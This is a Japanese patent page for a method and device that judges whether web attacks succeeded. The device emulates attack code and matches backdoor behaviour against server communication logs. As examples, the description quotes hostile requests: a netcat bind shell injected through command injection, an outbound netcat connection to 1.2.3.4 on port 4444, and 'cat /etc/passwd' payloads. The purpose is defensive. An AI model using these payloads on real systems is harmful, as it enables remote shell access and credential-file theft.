JP6867552B2 - 判定方法、判定装置および判定プログラム - Google Patents
判定方法、判定装置および判定プログラム Download PDFInfo
- Publication number
- JP6867552B2 JP6867552B2 JP2020521093A JP2020521093A JP6867552B2 JP 6867552 B2 JP6867552 B2 JP 6867552B2 JP 2020521093 A JP2020521093 A JP 2020521093A JP 2020521093 A JP2020521093 A JP 2020521093A JP 6867552 B2 JP6867552 B2 JP 6867552B2
- Authority
- JP
- Japan
- Prior art keywords
- attack
- code
- server
- type
- successful
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Images
Classifications
-
- G—PHYSICS
- G06—COMPUTING OR CALCULATING; COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/554—Detecting local intrusion or implementing counter-measures involving event detection and direct action
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1416—Event detection, e.g. attack signature detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1425—Traffic logging, e.g. anomaly detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1433—Vulnerability analysis
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1466—Active attacks involving interception, injection, modification, spoofing of data unit addresses, e.g. hijacking, packet injection or TCP sequence number attacks
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1491—Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- General Engineering & Computer Science (AREA)
- Computer Hardware Design (AREA)
- Computer Networks & Wireless Communication (AREA)
- Computing Systems (AREA)
- Signal Processing (AREA)
- Theoretical Computer Science (AREA)
- Software Systems (AREA)
- Physics & Mathematics (AREA)
- General Physics & Mathematics (AREA)
- Computer And Data Communications (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Description
本発明は、判定方法、判定装置および判定プログラムに関する。
Webアプリケーションは多くのサービスで利用されている一方で、不特定多数からアクセス可能なため攻撃に晒されやすい性質を持つ。攻撃は、WAF(Web Application Firewall)、NIDS(Network-based Intrusion Detection System)等により検知することができるが、攻撃が成功したか否かについては大量のアラートを調査・検証する必要がある。そこで、例えば、攻撃が成功したか否かを判定するため、攻撃リクエストに対応するレスポンスを検査し、攻撃が成功した際に現れる特徴があれば攻撃が成功したと判定し、攻撃が成功した際に現れる特徴がなければ攻撃が失敗したと判定する技術が考えられる(例えば、非特許文献1参照)。
鐘揚、青木一史、三好潤、嶋田創、高倉弘喜、"AVT Lite: 攻撃コードのエミュレーションに基づくWeb攻撃の成否判定手法"、コンピュータセキュリティシンポジウム 2017 論文集、2017
しかしながら、上記した従来の技術では、攻撃による痕跡がリクエストと同じコンテキストのレスポンスに存在することを前提としているため、攻撃が成功した際に別の通信を行い、バックドアとして働くような攻撃に対しては攻撃の成否判定ができないという課題があった。
本発明は、上記に鑑みてなされたものであって、バックドアとして働くような攻撃の成否を適切に判定することを目的とする。
上述した課題を解決し、目的を達成するために、本発明の判定方法は、攻撃コードによるサーバへの攻撃が成功したか否かを判定する判定方法であって、前記サーバへの攻撃リクエストに含まれる攻撃コードの攻撃タイプを判定する攻撃タイプ判定ステップと、前記判定された攻撃タイプに応じ、前記サーバへの前記攻撃コードによる攻撃のエミュレーションを実施する攻撃コード解析ステップと、前記エミュレーションの結果、前記サーバへの攻撃に成功した場合に前記サーバへの攻撃コードに現れるバックドア動作に関する特徴を抽出する特徴抽出ステップと、前記サーバの通信ログが前記抽出した特徴を有する場合、前記攻撃コードによる攻撃が成功したと判定する成否判定ステップとを含んだことを特徴とする。
また、本発明の判定装置は、攻撃コードによるサーバへの攻撃が成功したか否かを判定する判定装置であって、前記サーバへの攻撃リクエストに含まれる攻撃コードの攻撃タイプを判定する攻撃タイプ判定部と、前記判定された攻撃タイプに応じ、前記サーバへの前記攻撃コードによる攻撃のエミュレーションを実施する攻撃コード解析部と、前記エミュレーションの結果、前記サーバへの攻撃に成功した場合に前記サーバへの攻撃コードに現れるバックドア動作に関する特徴を抽出する特徴抽出部と、前記サーバの通信ログが前記抽出した特徴を有する場合、前記攻撃コードによる攻撃が成功したと判定する成否判定部とを備えたことを特徴とする。
また、本発明の判定プログラムは、攻撃コードによるサーバへの攻撃が成功したか否かを判定する判定プログラムであって、前記サーバへの攻撃リクエストに含まれる攻撃コードの攻撃タイプを判定する攻撃タイプ判定ステップと、前記判定された攻撃タイプに応じ、前記サーバへの前記攻撃コードによる攻撃のエミュレーションを実施する攻撃コード解析ステップと、前記エミュレーションの結果、前記サーバへの攻撃に成功した場合に前記サーバへの攻撃コードに現れるバックドア動作に関する特徴を抽出する特徴抽出ステップと、前記サーバの通信ログが前記抽出した特徴を有する場合、前記攻撃コードによる攻撃が成功したと判定する成否判定ステップとをコンピュータに実行させることを特徴とする。
本発明によれば、既存のシステムを変更することなく、バックドアとして働くような攻撃の成否を適切に判定することができるという効果を奏する。
以下、図面を参照しながら、本発明の実施形態を説明する。本発明は本実施形態に限定されない。
[第1の実施形態]
[概要]
図1を用いて、第1の実施形態の判定装置10の動作概要を説明する。まず、判定装置10は、例えば、図1に示すように、webアプリケーション(webサーバ)への攻撃リクエスト((1))を受信する。例えば、webアプリケーション/index.phpには任意のコマンド実行という脆弱性が存在し、webサーバが攻撃リクエストとして「GET /index.php?file=home;nc -l -p 4444 -e /bin/bash」という攻撃を受けたとする。
[概要]
図1を用いて、第1の実施形態の判定装置10の動作概要を説明する。まず、判定装置10は、例えば、図1に示すように、webアプリケーション(webサーバ)への攻撃リクエスト((1))を受信する。例えば、webアプリケーション/index.phpには任意のコマンド実行という脆弱性が存在し、webサーバが攻撃リクエストとして「GET /index.php?file=home;nc -l -p 4444 -e /bin/bash」という攻撃を受けたとする。
そして、判定装置10は、エミュレータで攻撃コードを実行し、エミュレータ内で観測した挙動を後述するバックドア動作特徴テーブル112(図1では図示略)に格納する(2)。例えば、判定装置10は、エミュレータで攻撃コードを実行した結果、この攻撃が成功するとポート番号4444で通信の接続を待ち受け、接続後/bin/bashが起動するため、外部から4444番ポートに接続することで、任意のコマンドが実行できることが観測できたものとする。
その後、Webサーバに対して4444番ポート(TCP4444ポート)で接続を確立するバックドア動作があったものとする(3)。そして、判定装置10は、バックドア動作特徴テーブル112を参照し、バックドア動作の有無によって攻撃リクエストの成否を判定する(4)。具体的には、判定装置10は、バックドア動作特徴テーブル112と実際の通信ログを照らし合わせることで、攻撃が成功しているか判定する。
このようにすることで、判定装置10は、攻撃リクエストがあった際、攻撃コードをエミュレータ内でその動作を観測し、攻撃コードで指定したバックドア通信の有無によって、攻撃の成否を判定する。この結果、判定装置10では、既存のシステムを改変することなく、攻撃コードをエミュレータ内でその動作を観測し、攻撃コードで指定したバックドア動作の有無によって、攻撃の成否を適切に判定することが可能である。
[構成]
次に、図2を用いて判定装置10の構成を説明する。判定装置10は、記憶部11と、攻撃検知部121と、攻撃タイプ判定部122と、攻撃コード解析部123と、特徴抽出部124と、成否判定部125とを備える。
次に、図2を用いて判定装置10の構成を説明する。判定装置10は、記憶部11と、攻撃検知部121と、攻撃タイプ判定部122と、攻撃コード解析部123と、特徴抽出部124と、成否判定部125とを備える。
攻撃タイプ別キーワードリスト111は、攻撃タイプごとに、当該攻撃タイプの攻撃コードに含まれるキーワードを示した情報である。この攻撃タイプ別キーワードリスト111は、攻撃タイプ判定部122が、攻撃コードに含まれるキーワードから攻撃タイプを判定する際に参照される。
なお、攻撃タイプは、例えば、A.OSコマンドを悪用する攻撃タイプ、B.プログラムコードを悪用する攻撃タイプ、C.SQLコマンド(DBの機能)を悪用する攻撃タイプ(例えば、SQL Injection等)、D.HTTPレスポンスを悪用する攻撃タイプ(例えば、XSS、Header Injection等)、E.ファイル操作を悪用する攻撃タイプ(例えば、ディレクトリトラバーサル等)の5つのタイプに分けられる。
なお、図3に例示するように、上記のA.の攻撃タイプではOSコマンドの名前をキーワードとする。また、B.の攻撃タイプではプログラミング言語で利用する固有表現をキーワードとする。例えば、PHPであればprint_r、var_dump、base64_decode等のPHPに固有の関数あるいはPHPの固有表現等($_GET、$_POST等)をキーワードとする。その他のプログラミング言語(Java(登録商標)、Perl、Ruby、Python等)においても同等である。そのため、B.の攻撃タイプではプログラミング言語毎に攻撃タイプ別キーワードリストを保持している。このとき、どのプログラミング言語に当たるかの情報は、例えば、図3に示すように、サブ攻撃タイプとして保持する。
また、C.の攻撃タイプではSQLコマンドの名前(select、update、insert、drop等)やDBアクセスの際の特徴的な表現をキーワードとする。例えば、MySQLの場合、information_schema、@@version、mysql等である。さらに、D.の攻撃タイプではHTMLやJavascript(登録商標)で利用される固有表現(alert、onclick等)をキーワードとする。また、E.の攻撃タイプではディレクトリトラバーサル攻撃で利用される固有表現(../等)をキーワードとする。
バックドア動作特徴テーブル112は、後述する攻撃コード解析部によってエミュレータで攻撃コードが実行された結果、エミュレータ内で観測された挙動を記憶するテーブルである。例えば、バックドア動作特徴テーブル112は、図4に例示するように、OSのシステムコール、アプリケーションのAPI呼び出しあるいは、通信の監視で観測された「動作」と、バックドア通信で用いられる「IPアドレス」および「ポート番号」とを記憶するテーブルである。通信ログ113は、Webサーバで実行された通信に関するログである。
攻撃検知部121は、webサーバへのリクエストが攻撃か否かの判定(攻撃検知)を行う。攻撃検知のアルゴリズムは、既存のシグネチャ検知のアルゴリズム(例えば、Snort (https://www.snort.org/)や、Bro(https://www.bro.org/))や、異常検知のアルゴリズム(例えば、Detecting Malicious Inputs of Web Application Parameters Using Character Class Sequences, COMPSAC, 2015)を用いてよい。
なお、ここでは、攻撃検知部121が処理対象とするリクエストにおけるURLエンコードやHTMLエンコードはデコード済みであるとする。例えば、リクエストが「GET /index.php?id=1234%3Bcat%20%2Fetc%2Fpasswd%3B」である場合、「GET /index.php?id=1234;cat /etc/passwd;」にデコード済であるものとする。
また、リクエストにおける攻撃コードの部分は、上記の既存のシグネチャ検知や異常検知のアルゴリズムにより出力されるものとする。例えば、リクエストが「GET /index.php?id=1234;cat /etc/passwd;」である場合、上記のアルゴリズムにより、上記のリクエストの攻撃コードの部分である「1234;cat /etc/passwd;」が出力されるものとする。
攻撃タイプ判定部122は、攻撃検知部121により攻撃と判定されたリクエストに含まれる攻撃コードに対して攻撃タイプの判定を行う。
ここで、攻撃タイプ判定部122は、例えば、webアプリケーションに対する攻撃の中でも特に重要と思われる、5つの攻撃タイプ(上記のA.〜E.の攻撃タイプ)のいずれであるかを判定する。ここでの攻撃タイプの判定は、攻撃コードに含まれるキーワードが、攻撃タイプ別キーワードリスト111(図3参照)に示されるどの攻撃タイプのキーワードとマッチするかにより行われる。
例えば、攻撃タイプ判定部122は、攻撃タイプ別キーワードリスト111を参照して、攻撃コードに「cat」が含まれていれば、当該攻撃コードをA.の攻撃タイプ(OSコマンドを悪用する攻撃タイプ)と判定する。また、攻撃タイプ判定部122は、攻撃コードに「print_r」が含まれていれば、当該攻撃コードをB.の攻撃タイプ(プログラムコードを悪用する攻撃タイプ)であり、その中でもphpを用いた攻撃タイプであると判定する。
なお、攻撃タイプ判定部122は、攻撃コードが、攻撃タイプ別キーワードリスト111(図3参照)に示される複数の攻撃タイプのキーワードとマッチした場合、例えば、攻撃コードの最初(攻撃コード内で最も左の位置)に出現したキーワードの攻撃タイプであると判定する。
一例を挙げると、攻撃コードが「;php -e “$i=123456789;var_dump($1)”;」の場合、攻撃タイプ別キーワードリスト111において、A.の攻撃タイプのキーワードである「php」と、B.の攻撃タイプのキーワードである「var_dump」とが出現する。このような場合、攻撃タイプ判定部122は、上記の攻撃コードにおいて「php」の方が「var_dump」よりも初めに出現しているので、A.の攻撃タイプと判定する。
なお、攻撃タイプ判定部122は、攻撃タイプ別キーワードリスト111を参照して、攻撃コードがどの攻撃タイプともマッチしなかった場合は判定不可とする。
攻撃コード解析部123は、判定された攻撃タイプに応じ、Webサーバへの攻撃コードによる攻撃のエミュレーションを実施する。具体的には、攻撃コード解析部123は、攻撃タイプ判定部122で判定された攻撃コードの攻撃タイプに応じたエミュレータを用いて、当該攻撃コードによるwebアプリケーションへの攻撃のエミュレーションを実施する。
なお、上記の各攻撃タイプに応じたエミュレータは、例えば、デバッガやインタープリタを応用して事前に作成しておき、攻撃コード解析部123は、事前作成されたエミュレータから、攻撃タイプに応じたエミュレータを選択する。
例えば、攻撃コードの攻撃タイプがA.OSコマンドを悪用する攻撃タイプである場合、攻撃コード解析部123は、OSコマンドを実行できる環境(例えば、Windows(登録商標)のコマンドプロンプト、Linux(登録商標)のbash、あるいはコマンドをエミュレートできるエミュレータ)を用いて、当該攻撃コードをコマンドとして実行する。
一例を挙げると、攻撃コード解析部123は、「bash -c "cat /etc/passwd;”」というように、bashコマンドに-c引数で指定したコマンドを実行させる。また、例えば、攻撃コードの攻撃タイプが、B.プログラムコードを悪用する攻撃タイプである場合、攻撃コード解析部123は、プログラミング言語に対して適切なインタープリタあるいはエミュレータを用いて、当該攻撃コードを実行する。
一例を挙げると、攻撃コードが、phpコードの場合、攻撃コード解析部123は、「php -r ”print(‘123456789’);die();”」というように、phpインタープリタに-r引数で指定したコードを実行させる。また、攻撃コードがpythonコードの場合、攻撃コード解析部123は、「python -c “import sys;print 123456789;sys.exit()”」というように、pythonインタープリタに-c引数で指定したコードを実行させる。
また、攻撃コードの攻撃タイプが、C.SQLコマンド(DBの機能)を悪用する攻撃タイプ(例えば、SQL Injection等)である場合、攻撃コード解析部123は、DBに対してSQL文を実行できるターミナルあるいはエミュレータを用いて、当該攻撃コードを実行する。
なお、SQL Injection攻撃によって挿入されるSQL文(SQLコマンド)は部分的なものであり、そのままでは実行できない。よって、攻撃コード解析部123は、SQL文の整形を行う。例えば、攻撃コード解析部123は、SQL文のSELECT句等より前の部分を消去することにより、SQL文をSELECT句等が攻撃コードの最初に現れるように変更する。なお、攻撃コード解析部123が、SQL文の句のうち、最初に現れるように調整するキーワードはSELECT句以外の句(例えば、update、delete、drop等の句)であってもよく、これらの句は攻撃タイプ別キーワードリスト111(図3参照)で与えられているものとする。
特徴抽出部124は、エミュレーションの結果、Webサーバへの攻撃に成功した場合にWebサーバへの攻撃コードに現れるバックドア動作に関する特徴を抽出する。例えば、特徴抽出部124は、バックドア動作に関する特徴として、OSのシステムコール、アプリケーションのAPI呼び出しあるいは通信ログを抽出する。
つまり、特徴抽出部124は、エミュレーション時の攻撃コードが実行されている際のバックドア動作に関する特徴を抽出する。ここでいう動作とは具体的にはOSのシステムコール、アプリケーションのAPI呼び出しあるいは通信ログなどのことを指している。取得方法は既存のシステムコールモニターやAPIモニターを利用する。
例えば、攻撃リクエストが「GET /index.php?file=home;nc -l -p 4444 -e /bin/bash」の場合には、「nc -l -p 4444 -e /bin/bash」が攻撃コードとなるため、攻撃コード解析部123は、このコマンドをエミュレートする際はエミュレータで実際にこのコマンドを実行する。その際に、攻撃コード解析部123は、システムコールをモニターするLinuxのstraceコマンドを攻撃コマンドを実行する以前に挿入することで、攻撃コマンドの実行ログを取得することが可能となる。例えば、下記の例ではシステムコールのbindが呼び出されており、ポート番号4444で接続を受け付けることが分かる。
実行例:strace nc -l -p 4444
出力:bind(4<TCP:[96541]>, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 128) = 0
実行例:strace nc -l -p 4444
出力:bind(4<TCP:[96541]>, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 128) = 0
もう一つの例を示す。例えば、攻撃リクエストが「GET /index.php?file=home;nc 1.2.3.4 4444」の場合には、「nc 1.2.3.4 4444」が攻撃コードとなるため、攻撃コード解析部123は、このコマンドをエミュレートする際はエミュレータで実際にこのコマンドを実行する。その際に、攻撃コード解析部123は、通信を観測するtcpdumpコマンド等を実行しながら、攻撃コマンドを実行することで、攻撃コマンドを実行した際の通信ログを取得することが可能となる。
例えば、下記の例では通信先が1.2.3.4、ポート番号4444で接続を行うことが分かる。
実行例:tcpdump -i eth0
出力:
00:00:01 IP 192.168.1.2.50000 > 1.2.3.4.4444: Flags [S], seq 100000000, win 65535
00:00:02 IP 192.168.1.2.50000 > 1.2.3.4.4444: Flags [S], seq 100000000, win 65535
例えば、下記の例では通信先が1.2.3.4、ポート番号4444で接続を行うことが分かる。
実行例:tcpdump -i eth0
出力:
00:00:01 IP 192.168.1.2.50000 > 1.2.3.4.4444: Flags [S], seq 100000000, win 65535
00:00:02 IP 192.168.1.2.50000 > 1.2.3.4.4444: Flags [S], seq 100000000, win 65535
特徴抽出部124は、このようにして取得したシステムコールのログや通信ログ等を動作としてバックドア動作特徴テーブル112に保存する(図4参照)。
成否判定部125は、Webサーバにおける実際の通信の通信ログが、特徴抽出部124によって抽出された特徴を有する場合、攻撃コードによる攻撃が成功したと判定する。一方、成否判定部125は、Webサーバの通信ログが、特徴抽出部124によって抽出された特徴を有していない場合、攻撃は失敗したと判定する。そして、成否判定部125は、攻撃の成否(成功/失敗)の判定結果を出力する。
判定方法として、例えば、成否判定部125は、バックドア動作特徴テーブル112に保存された動作と実際の動作を照合し、バックドア動作の有無によって攻撃の成否を判定する。なお、判定方法は観測された動作によって異なるようにしてもよい。例えば、成否判定部125は、動作が接続待ちを表す「bind」である場合には、判定方法として、時間T以内に攻撃対象となったホストに対して観測したポート番号に対して接続が確立したかどうか判定し、確立した場合は成功、確立できなかった場合は失敗と判定する。また、例えば、成否判定部125は、動作が接続することを表す「connect」である場合には、判定方法として、時間T以内に観測したIPアドレスおよびポート番号に対して接続が確立したかどうか判定し、確立した場合は成功、確立できなかった場合は失敗と判定する。
この場合に、例えば、前述した例では、4444番ポートで接続を待ち受けるため、成否判定部125は、時間T以内に攻撃者からポート番号4444に対して接続が確立される場合は攻撃成功と判定し、確立されなければ失敗と判定する。
[処理手順]
次に、図5を用いて、判定装置10の処理手順を説明する。まず、判定装置10の攻撃検知部121は、webアプリケーションへのリクエストが攻撃か否かを判定する(S1)。ここで、当該リクエストが攻撃であれば(S1でYes)、攻撃タイプ判定部122は、攻撃タイプ別キーワードリスト111を参照して、当該リクエストに含まれる攻撃コードの攻撃タイプを判定する(S2)。攻撃タイプ判定部122が攻撃タイプを判定可能な場合(S3でYes)、攻撃コード解析部123は、判定された攻撃タイプに基づき、攻撃コードのエミュレーションを実行する。そして、特徴抽出部124は、エミュレーションの結果、Webサーバへの攻撃に成功した場合にWebサーバへの攻撃コードに現れるバックドア動作に関する特徴を抽出する攻撃コード解析処理を行う(S4)。なお、S1において攻撃検知部121がwebアプリケーションへのリクエストは攻撃ではないと判定した場合(S1でNo)、処理を終了する。
次に、図5を用いて、判定装置10の処理手順を説明する。まず、判定装置10の攻撃検知部121は、webアプリケーションへのリクエストが攻撃か否かを判定する(S1)。ここで、当該リクエストが攻撃であれば(S1でYes)、攻撃タイプ判定部122は、攻撃タイプ別キーワードリスト111を参照して、当該リクエストに含まれる攻撃コードの攻撃タイプを判定する(S2)。攻撃タイプ判定部122が攻撃タイプを判定可能な場合(S3でYes)、攻撃コード解析部123は、判定された攻撃タイプに基づき、攻撃コードのエミュレーションを実行する。そして、特徴抽出部124は、エミュレーションの結果、Webサーバへの攻撃に成功した場合にWebサーバへの攻撃コードに現れるバックドア動作に関する特徴を抽出する攻撃コード解析処理を行う(S4)。なお、S1において攻撃検知部121がwebアプリケーションへのリクエストは攻撃ではないと判定した場合(S1でNo)、処理を終了する。
S4の後、成否判定部125は、エミュレーションで観測したバックドアの挙動と実際の通信を比較する(ステップS5)。この結果、成否判定部125は、バックドアの動作がないと判定した場合には(S6でNo)、攻撃は失敗したとして、外部装置等に通知する(S8)。また、成否判定部125は、バックドアの動作があると判定した場合には(S6でYes)、攻撃は成功したとして、外部装置等に通知する(S7)。なお、S3において攻撃タイプ判定部122が攻撃タイプの判定不可能な場合(S3でNo)、あるいは、判定装置10は、攻撃の成否判定は不可として、外部装置等に通知する(S9)。
[第1の実施形態の効果]
このような判定装置10によれば、攻撃コードをエミュレータ内でその動作を観測し、攻撃コードで指定したバックドア動作の有無によって、攻撃の成否を判定できるようになるため、既存のシステムを変更することなく、バックドアとして働くような攻撃の成否を適切に判定することができるという効果を奏する。
このような判定装置10によれば、攻撃コードをエミュレータ内でその動作を観測し、攻撃コードで指定したバックドア動作の有無によって、攻撃の成否を判定できるようになるため、既存のシステムを変更することなく、バックドアとして働くような攻撃の成否を適切に判定することができるという効果を奏する。
[その他の実施形態]
なお、上述した判定装置10における攻撃検知部121は、判定装置10の外部に設置されていてもよい。例えば、図6(a)、(b)に示すように、判定装置10の外部に設置されるWAF等の攻撃検知機器により実現されてもよい。また、判定装置10は、図6(a)に示すように、攻撃の成否の判定対象となるwebサーバと直接接続する構成(インライン構成)としてもよいし、図6(b)に示すように、webサーバとWAF等の攻撃検知機器経由で接続する構成(タップ構成)としてもよい。
なお、上述した判定装置10における攻撃検知部121は、判定装置10の外部に設置されていてもよい。例えば、図6(a)、(b)に示すように、判定装置10の外部に設置されるWAF等の攻撃検知機器により実現されてもよい。また、判定装置10は、図6(a)に示すように、攻撃の成否の判定対象となるwebサーバと直接接続する構成(インライン構成)としてもよいし、図6(b)に示すように、webサーバとWAF等の攻撃検知機器経由で接続する構成(タップ構成)としてもよい。
[システム構成等]
また、図示した各装置の各構成要素は機能概念的なものであり、必ずしも物理的に図示の如く構成されていることを要しない。すなわち、各装置の分散・統合の具体的形態は図示のものに限られず、その全部または一部を、各種の負荷や使用状況などに応じて、任意の単位で機能的または物理的に分散・統合して構成することができる。さらに、各装置にて行われる各処理機能は、その全部または任意の一部が、CPUおよび当該CPUにて解析実行されるプログラムにて実現され、あるいは、ワイヤードロジックによるハードウェアとして実現され得る。
また、図示した各装置の各構成要素は機能概念的なものであり、必ずしも物理的に図示の如く構成されていることを要しない。すなわち、各装置の分散・統合の具体的形態は図示のものに限られず、その全部または一部を、各種の負荷や使用状況などに応じて、任意の単位で機能的または物理的に分散・統合して構成することができる。さらに、各装置にて行われる各処理機能は、その全部または任意の一部が、CPUおよび当該CPUにて解析実行されるプログラムにて実現され、あるいは、ワイヤードロジックによるハードウェアとして実現され得る。
また、本実施の形態において説明した各処理のうち、自動的に行われるものとして説明した処理の全部または一部を手動的に行うこともでき、あるいは、手動的におこなわれるものとして説明した処理の全部または一部を公知の方法で自動的に行うこともできる。この他、上記文書中や図面中で示した処理手順、制御手順、具体的名称、各種のデータやパラメータを含む情報については、特記する場合を除いて任意に変更することができる。
[プログラム]
また、上記の実施形態で述べた判定装置10の機能を実現するプログラムを所望の情報処理装置(コンピュータ)にインストールすることによって実装できる。例えば、パッケージソフトウェアやオンラインソフトウェアとして提供される上記のプログラムを情報処理装置に実行させることにより、情報処理装置を判定装置10として機能させることができる。ここで言う情報処理装置には、デスクトップ型またはノート型のパーソナルコンピュータが含まれる。また、その他にも、情報処理装置にはスマートフォン、携帯電話機やPHS(Personal Handyphone System)等の移動体通信端末、さらには、PDA(Personal Digital Assistants)等がその範疇に含まれる。また、判定装置10を、クラウドサーバに実装してもよい。
また、上記の実施形態で述べた判定装置10の機能を実現するプログラムを所望の情報処理装置(コンピュータ)にインストールすることによって実装できる。例えば、パッケージソフトウェアやオンラインソフトウェアとして提供される上記のプログラムを情報処理装置に実行させることにより、情報処理装置を判定装置10として機能させることができる。ここで言う情報処理装置には、デスクトップ型またはノート型のパーソナルコンピュータが含まれる。また、その他にも、情報処理装置にはスマートフォン、携帯電話機やPHS(Personal Handyphone System)等の移動体通信端末、さらには、PDA(Personal Digital Assistants)等がその範疇に含まれる。また、判定装置10を、クラウドサーバに実装してもよい。
図7を用いて、上記のプログラム(判定プログラム)を実行するコンピュータの一例を説明する。図7に示すように、コンピュータ1000は、例えば、メモリ1010と、CPU1020と、ハードディスクドライブインタフェース1030と、ディスクドライブインタフェース1040と、シリアルポートインタフェース1050と、ビデオアダプタ1060と、ネットワークインタフェース1070とを有する。これらの各部は、バス1080によって接続される。
メモリ1010は、ROM(Read Only Memory)1011およびRAM(Random Access Memory)1012を含む。ROM1011は、例えば、BIOS(Basic Input Output System)等のブートプログラムを記憶する。ハードディスクドライブインタフェース1030は、ハードディスクドライブ1090に接続される。ディスクドライブインタフェース1040は、ディスクドライブ1100に接続される。ディスクドライブ1100には、例えば、磁気ディスクや光ディスク等の着脱可能な記憶媒体が挿入される。シリアルポートインタフェース1050には、例えば、マウス1110およびキーボード1120が接続される。ビデオアダプタ1060には、例えば、ディスプレイ1130が接続される。
ここで、図7に示すように、ハードディスクドライブ1090は、例えば、OS1091、アプリケーションプログラム1092、プログラムモジュール1093およびプログラムデータ1094を記憶する。前記した実施形態で説明した各種データや情報は、例えばハードディスクドライブ1090やメモリ1010に記憶される。
そして、CPU1020が、ハードディスクドライブ1090に記憶されたプログラムモジュール1093やプログラムデータ1094を必要に応じてRAM1012に読み出して、上述した各手順を実行する。
なお、上記の判定プログラムに係るプログラムモジュール1093やプログラムデータ1094は、ハードディスクドライブ1090に記憶される場合に限られず、例えば、着脱可能な記憶媒体に記憶されて、ディスクドライブ1100等を介してCPU1020によって読み出されてもよい。あるいは、上記のプログラムに係るプログラムモジュール1093やプログラムデータ1094は、LAN(Local Area Network)やWAN(Wide Area Network)等のネットワークを介して接続された他のコンピュータに記憶され、ネットワークインタフェース1070を介してCPU1020によって読み出されてもよい。
10 判定装置
11 記憶部
111 攻撃タイプ別キーワードリスト
112 バックドア動作特徴テーブル
113 通信ログ
121 攻撃検知部
122 攻撃タイプ判定部
123 攻撃コード解析部
125 成否判定部
11 記憶部
111 攻撃タイプ別キーワードリスト
112 バックドア動作特徴テーブル
113 通信ログ
121 攻撃検知部
122 攻撃タイプ判定部
123 攻撃コード解析部
125 成否判定部
Claims (4)
- 攻撃コードによるサーバへの攻撃が成功したか否かを判定する判定方法であって、
前記サーバへの攻撃リクエストに含まれる攻撃コードの攻撃タイプを判定する攻撃タイプ判定ステップと、
前記判定された攻撃タイプに応じ、前記サーバへの前記攻撃コードによる攻撃のエミュレーションを実施する攻撃コード解析ステップと、
前記エミュレーションの結果、前記サーバへの攻撃に成功した場合に前記サーバへの攻撃コードに現れるバックドア動作に関する特徴を抽出する特徴抽出ステップと、
前記サーバの通信ログが前記抽出した特徴を有する場合、前記攻撃コードによる攻撃が成功したと判定する成否判定ステップと
を含んだことを特徴とする判定方法。 - 前記特徴抽出ステップは、前記バックドア動作に関する特徴として、OSのシステムコール、アプリケーションのAPI呼び出しあるいは、通信ログを抽出することを特徴とする請求項1に記載の判定方法。
- 攻撃コードによるサーバへの攻撃が成功したか否かを判定する判定装置であって、
前記サーバへの攻撃リクエストに含まれる攻撃コードの攻撃タイプを判定する攻撃タイプ判定部と、
前記判定された攻撃タイプに応じ、前記サーバへの前記攻撃コードによる攻撃のエミュレーションを実施する攻撃コード解析部と、
前記エミュレーションの結果、前記サーバへの攻撃に成功した場合に前記サーバへの攻撃コードに現れるバックドア動作に関する特徴を抽出する特徴抽出部と、
前記サーバの通信ログが前記抽出した特徴を有する場合、前記攻撃コードによる攻撃が成功したと判定する成否判定部と
を備えたことを特徴とする判定装置。 - 攻撃コードによるサーバへの攻撃が成功したか否かを判定する判定プログラムであって、
前記サーバへの攻撃リクエストに含まれる攻撃コードの攻撃タイプを判定する攻撃タイプ判定ステップと、
前記判定された攻撃タイプに応じ、前記サーバへの前記攻撃コードによる攻撃のエミュレーションを実施する攻撃コード解析ステップと、
前記エミュレーションの結果、前記サーバへの攻撃に成功した場合に前記サーバへの攻撃コードに現れるバックドア動作に関する特徴を抽出する特徴抽出ステップと、
前記サーバの通信ログが前記抽出した特徴を有する場合、前記攻撃コードによる攻撃が成功したと判定する成否判定ステップと
をコンピュータに実行させることを特徴とする判定プログラム。
Applications Claiming Priority (3)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| JP2018097419 | 2018-05-21 | ||
| JP2018097419 | 2018-05-21 | ||
